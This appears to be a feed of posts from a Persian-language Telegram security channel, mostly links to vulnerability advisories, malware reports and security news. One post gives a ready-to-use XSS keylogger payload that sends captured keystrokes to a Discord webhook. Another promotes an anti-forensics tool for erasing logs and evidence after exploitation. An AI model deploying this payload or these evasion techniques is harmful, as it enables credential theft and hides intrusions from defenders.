⭕️ Triggering RCE in the Samsung Galaxy phones via Galaxy Store Vulnerability
آسیب پذیری پیدا شده در Galaxy Store اجازه RCE توسط حمله کننده در تلفن همراه را می دهد.
این آسیب پذیری از طریق deeplink هندل شده نا امن رخ می دهد که به موجب آن حمله کننده قادر به اجرای کد JS در webview می شود. deeplink ها می توانند توسط اپلیکیشن های دیگر یا مرورگر فراخوانی شوند. Galaxy Store نیز هنگام دریافت deeplink مرتبط با خودش
https://ssd-disclosure.com/ssd-advisory-galaxy-store-applications-installation-launching-without-user-interaction/
#galaxy #store #rce
@securation
آسیب پذیری پیدا شده در Galaxy Store اجازه RCE توسط حمله کننده در تلفن همراه را می دهد.
این آسیب پذیری از طریق deeplink هندل شده نا امن رخ می دهد که به موجب آن حمله کننده قادر به اجرای کد JS در webview می شود. deeplink ها می توانند توسط اپلیکیشن های دیگر یا مرورگر فراخوانی شوند. Galaxy Store نیز هنگام دریافت deeplink مرتبط با خودش
//:samsungapps آن را پردازش و از طریق webview نمایش می دهد.https://ssd-disclosure.com/ssd-advisory-galaxy-store-applications-installation-launching-without-user-interaction/
#galaxy #store #rce
@securation
SSD Secure Disclosure
SSD Advisory – Galaxy Store Applications Installation/Launching without User Interaction - SSD Secure Disclosure
A vulnerability in the Galaxy Store allows attackers through an XSS to cause the store to install and/or launch an application, allowing remote attackers to trigger a remote command execution in the phone.
👍17
⭕️ شرکت آروان کلود و پرس تی وی در لیست تحریم های اروپا قرار گرفتند.
لیست و جزییات کامل :
https://eur-lex.europa.eu/legal-content/EN/TXT/PDF/?uri=OJ:L:2022:293I:FULL&from=EN
@securation
لیست و جزییات کامل :
https://eur-lex.europa.eu/legal-content/EN/TXT/PDF/?uri=OJ:L:2022:293I:FULL&from=EN
@securation
👍30🎉11👎7
⭕️ناتو خود را برای یک "جنگ سایبری" آماده میکند.
حدود 150 کارشناس امنیت سایبری ناتو این هفته در استونی گردهم آمدند تا برای شبیهسازی مقابله با یک جنگ سایبری تمام عیار آماده شوند
https://www.politico.com/news/2022/12/03/nato-future-cyber-war-00072060
#cyberwar
@securation
حدود 150 کارشناس امنیت سایبری ناتو این هفته در استونی گردهم آمدند تا برای شبیهسازی مقابله با یک جنگ سایبری تمام عیار آماده شوند
https://www.politico.com/news/2022/12/03/nato-future-cyber-war-00072060
#cyberwar
@securation
🤩39😁6👍5😱5
⭕️ درحالی که توی کانادا مسابقات Pwn2Own 2022 در حال امادگی و برگزاری هست ، اینجا توی ایران یک مشت گاو نشستن روی کابل اینترنت فقط دنبال فیلتر کردن و قطع کانکشن های ارتباطی هستن.
https://www.zerodayinitiative.com/blog/2022/12/5/pwn2own-toronto-2022-the-schedule #pwn #pwn2own
@securation
https://www.zerodayinitiative.com/blog/2022/12/5/pwn2own-toronto-2022-the-schedule #pwn #pwn2own
@securation
Zero Day Initiative
Zero Day Initiative — Pwn2Own Toronto 2022 - The Schedule
Welcome to Pwn2Own Toronto 2022! his year marks the 10th anniversary of our consumer-focused version of the contest, and we plan on celebrating by putting some amazing research on display. For this year’s event, we have 26 contestants and teams attempting…
😢35👍9😁2👎1🤩1
Exclusive: ChatGPT owner OpenAI projects $1 billion in revenue by 2024
https://www.reuters.com/business/chatgpt-owner-openai-projects-1-billion-revenue-by-2024-sources-2022-12-15/
https://www.reuters.com/business/chatgpt-owner-openai-projects-1-billion-revenue-by-2024-sources-2022-12-15/
Reuters
Exclusive: ChatGPT owner OpenAI projects $1 billion in revenue by 2024
The forecast represents how some are betting the AI tech will go far beyond splashy and sometimes flawed public demos.
👍6🔥1
⭕️ نامردا رفتن به اسم من یه بدافزار موبایلی نوشتن که تارگت هاش حسابهای بانکی افراد هست:(
گادفادر واقعی از این کارها نمیکنه
https://blog.cyble.com/2022/12/20/godfather-malware-returns-targeting-banking-users/
#godfather #malware
@securation
گادفادر واقعی از این کارها نمیکنه
https://blog.cyble.com/2022/12/20/godfather-malware-returns-targeting-banking-users/
#godfather #malware
@securation
Cyble
Godfather Malware Returns: Targeting Banking Users And Online Security
The Godfather malware is back, specifically targeting banking users. Learn how this threat works and what steps you can take to protect your online banking security.
😁32👎8😢4👍3😱2
⭕️XSS Payload
Discord Keylogger
usage:
@securation
Discord Keylogger
usage:
<img src onerror='let x=!1,l="";document.onkeypress=function(a){l+=a.key,x=!0},setInterval(()=>{x&&(fetch("//discord.com/api/webhook/...",{method:"post",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:l})}),x=!1)},1e3);'>
#discord #xss #bugbounty@securation
🔥20👎2👍1
ASIS CTF Finals 2022 (1725)
Jeopardy
Fri, December 30, 2022 14:30 UTC+00:00
Weight: 98 points
Duration: 1 day
Jeopardy
Fri, December 30, 2022 14:30 UTC+00:00
Weight: 98 points
Duration: 1 day
ctftime.org
ASIS CTF Finals 2022
ASIS CTF Finals 2022 CTF event
🔥13👎3😢1
Google Releases Open-Source Vulnerability Scanning Tool
https://www.infoq.com/news/2022/12/google-osv-scanner/
https://www.infoq.com/news/2022/12/google-osv-scanner/
InfoQ
Google Releases Open-Source Vulnerability Scanning Tool
Google has released OSV-Scanner, an open-source front-end interface to the Open Source Vulnerability (OSV) database. The OSV database is a distributed, open-source database that stores vulnerability information in the OSV format. The OSV-Scanner assesses…
😢6👍1
⭕️linWinPwn
#ad #enum
@securation
bash script that automates a number of Active Directory Enumeration and Vulnerability checks
https://github.com/lefayjey/linWinPwn#ad #enum
@securation
GitHub
GitHub - lefayjey/linWinPwn: linWinPwn is a bash script that streamlines the use of a number of Active Directory tools
linWinPwn is a bash script that streamlines the use of a number of Active Directory tools - lefayjey/linWinPwn
👍11
⭕️RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass
https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/
#rce #ssti
@securation
https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/
#rce #ssti
@securation
👍9
⭕️ Offensive Security & Reverse Engineering Course
https://github.com/ashemery/exploitation-course
#reverse #pwn #exploit #offensive
@securation
https://github.com/ashemery/exploitation-course
#reverse #pwn #exploit #offensive
@securation
🤩6👍1
⭕️ اینجا قبلا درمورد نشر و نصب انواع بدافزارها بخاطر افزایش فیلترینگ و سانسور و مراجعه مردم به نصب انواع VPN های ناامن مطلبی نوشته بودم.
حالا بیت دفندر در اینجا گزارش داده که بدافزاری در قالب Vpn کاربران ایرانی رو هک میکرده.
این بدافزار به نام 20speed vpn فعالیت میکرده که بیشترین کاربر هک شده ی آن ایرانی هستند.
نتیجه ی تصمیم های چند احمق در جایگاه مسئول در ایران باعث رونق بدافزارها و در خطر افتادن حریم خصوصی مردم و همچنین امنیت مِلی گردیده است.
#فیلترینگ #سانسور
#بدافزار #فیلترشکن
@securation
حالا بیت دفندر در اینجا گزارش داده که بدافزاری در قالب Vpn کاربران ایرانی رو هک میکرده.
این بدافزار به نام 20speed vpn فعالیت میکرده که بیشترین کاربر هک شده ی آن ایرانی هستند.
نتیجه ی تصمیم های چند احمق در جایگاه مسئول در ایران باعث رونق بدافزارها و در خطر افتادن حریم خصوصی مردم و همچنین امنیت مِلی گردیده است.
#فیلترینگ #سانسور
#بدافزار #فیلترشکن
@securation
👍41😱4👎2🔥1😢1🤩1
⭕️از مهم ترین اقدامات Pentest و Redteam تکنیک های Anti Forensic است، ابزاری اخیرا منتشر شده که تکنیک های زیر را در بر میگیرد:
Unloading Sysmon Driver.
Gutmann Method File Shredding.
USNJrnl Disabler.
Prefetch Disabler.
Log Eraser and Event log Disabler.
User Assist Update Time Disabler.
Access Time Disabler.
Clear Recent Items
Clear Shim Cache
Clear RecentFileCache
Clear ShellBag
File Melting Capabilities.
https://github.com/PaulNorman01/Forensia
#redteam #antiforensic
@securation
Unloading Sysmon Driver.
Gutmann Method File Shredding.
USNJrnl Disabler.
Prefetch Disabler.
Log Eraser and Event log Disabler.
User Assist Update Time Disabler.
Access Time Disabler.
Clear Recent Items
Clear Shim Cache
Clear RecentFileCache
Clear ShellBag
File Melting Capabilities.
https://github.com/PaulNorman01/Forensia
#redteam #antiforensic
@securation
GitHub
GitHub - PaulNorman01/Forensia: Anti Forensics Tool For Red Teamers, Used For Erasing Footprints In The Post Exploitation Phase.
Anti Forensics Tool For Red Teamers, Used For Erasing Footprints In The Post Exploitation Phase. - PaulNorman01/Forensia
👍13🔥1😢1